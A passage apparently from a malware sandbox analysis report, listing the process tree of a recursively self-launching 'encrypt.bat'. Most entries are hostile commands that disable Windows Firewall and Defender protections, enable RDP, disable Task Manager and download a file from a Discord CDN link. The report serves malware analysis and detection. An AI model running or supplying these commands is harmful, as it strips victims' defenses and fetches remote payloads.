C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off26⤵PID:3928
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off26⤵PID:5080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off26⤵PID:1656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"26⤵PID:3556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵PID:3172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵PID:1664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"26⤵
- Blocklisted process makes network request
PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"26⤵
- Modifies registry class
PID:2632
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"27⤵PID:1156
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"28⤵PID:3164
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f28⤵PID:4812
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"28⤵PID:2340
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f28⤵PID:2952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:2680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:3460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵PID:5024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:4524
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable28⤵PID:1656
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE28⤵PID:3860
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off28⤵PID:3472
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off28⤵PID:4532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off28⤵PID:3068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off28⤵PID:1192
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off28⤵PID:1780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"28⤵PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:2364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵PID:1380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵PID:900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:1656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"28⤵
- Blocklisted process makes network request
PID:4248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"28⤵
- Modifies registry class
PID:2632
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"29⤵PID:1104
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV130⤵PID:4812
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"30⤵PID:2604
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f30⤵PID:2952
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"30⤵PID:3272
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f30⤵PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵PID:2864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵PID:5024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵PID:240
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable30⤵PID:1108
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE30⤵
- Modifies Windows Firewall
PID:1376
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off30⤵PID:4064
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off30⤵PID:1188
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off30⤵PID:5060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off30⤵PID:4532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off30⤵PID:2360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"30⤵PID:4748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵PID:2412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:4800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵PID:892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:3876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵PID:1876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"30⤵
- Blocklisted process makes network request
PID:4500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"30⤵
- Modifies registry class
PID:4024
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"31⤵PID:3816
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"32⤵PID:3044
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f32⤵PID:3080
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"32⤵PID:2960
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f32⤵PID:2444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"32⤵PID:4548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"32⤵PID:432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"32⤵PID:4704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"32⤵PID:2012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"32⤵PID:3408
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable32⤵PID:452
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE32⤵PID:5080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off32⤵PID:2500
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off32⤵
- Modifies Windows Firewall
PID:3952
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off32⤵PID:2172
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off32⤵PID:2060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off32⤵PID:5056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"32⤵PID:3164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"32⤵PID:1096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"32⤵PID:1092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"32⤵PID:1528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"32⤵PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"32⤵PID:1064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"32⤵
- Blocklisted process makes network request
PID:4572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"32⤵PID:4584
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"33⤵PID:3460
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"34⤵PID:1736
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f34⤵PID:1840
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"34⤵PID:2632
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f34⤵PID:2340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"34⤵PID:1264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"34⤵PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"34⤵PID:2396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"34⤵
- Command and Scripting Interpreter: PowerShell
PID:2232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"34⤵PID:2352
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable34⤵PID:900
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE34⤵PID:4740
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off34⤵PID:2516
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off34⤵PID:4244
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off34⤵PID:1560
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off34⤵PID:5060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off34⤵PID:4588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"34⤵
- Command and Scripting Interpreter: PowerShell
PID:396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"34⤵PID:1992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"34⤵PID:4312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"34⤵PID:4900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"34⤵PID:892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"34⤵PID:2100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"34⤵
- Blocklisted process makes network request
PID:452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"34⤵
- Modifies registry class
PID:4516
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"35⤵PID:2912
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"36⤵PID:3076
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f36⤵PID:1432
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"36⤵PID:3148
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f36⤵PID:1584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"36⤵PID:4436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"36⤵PID:3980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"36⤵PID:3040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"36⤵PID:2044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"36⤵PID:460
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable36⤵PID:4760
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE36⤵PID:4288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off36⤵PID:3340
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off36⤵PID:1884
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off36⤵PID:1688
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off36⤵PID:1932
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off36⤵PID:3952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"36⤵
- Command and Scripting Interpreter: PowerShell
PID:4584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"36⤵PID:1432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"36⤵PID:4432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"36⤵PID:1616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"36⤵PID:236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"36⤵PID:276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"36⤵
- Blocklisted process makes network request
PID:1448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"36⤵PID:1392
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"37⤵PID:2072
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"38⤵PID:2360
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f38⤵PID:996
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"38⤵PID:4816
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f38⤵PID:4284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"38⤵PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"38⤵PID:4244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"38⤵
- Command and Scripting Interpreter: PowerShell
PID:2252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"38⤵PID:2008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"38⤵PID:2364
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable38⤵PID:236
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE38⤵PID:2764
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off38⤵PID:3480
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off38⤵PID:3000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off38⤵
- Modifies Windows Firewall
PID:4972
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off38⤵
- Modifies Windows Firewall
PID:1884
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off38⤵PID:3276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"38⤵PID:3164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"38⤵PID:2320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"38⤵PID:3160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"38⤵PID:4792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"38⤵PID:1476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"38⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"38⤵
- Blocklisted process makes network request
PID:740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"38⤵
- Modifies registry class
PID:2324
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"39⤵PID:3472
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"40⤵PID:2912
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f40⤵PID:3960
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"40⤵PID:3908
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f40⤵PID:4064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"40⤵PID:3572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"40⤵
- Command and Scripting Interpreter: PowerShell
PID:4584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"40⤵PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"40⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"40⤵PID:976
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable40⤵PID:1504
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE40⤵PID:240
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off40⤵PID:3008
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off40⤵PID:1408
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off40⤵PID:424
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off40⤵PID:4756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off40⤵PID:3716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"40⤵PID:3164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"40⤵PID:1780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"40⤵PID:1104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"40⤵PID:1264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"40⤵PID:3768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"40⤵PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"40⤵
- Blocklisted process makes network request
PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"40⤵
- Modifies registry class
PID:1884
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"41⤵PID:4756
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"42⤵PID:2808
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f42⤵PID:2344
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"42⤵PID:4720
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f42⤵PID:1840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"42⤵PID:2060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"42⤵PID:2712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"42⤵PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"42⤵PID:3512
-
-
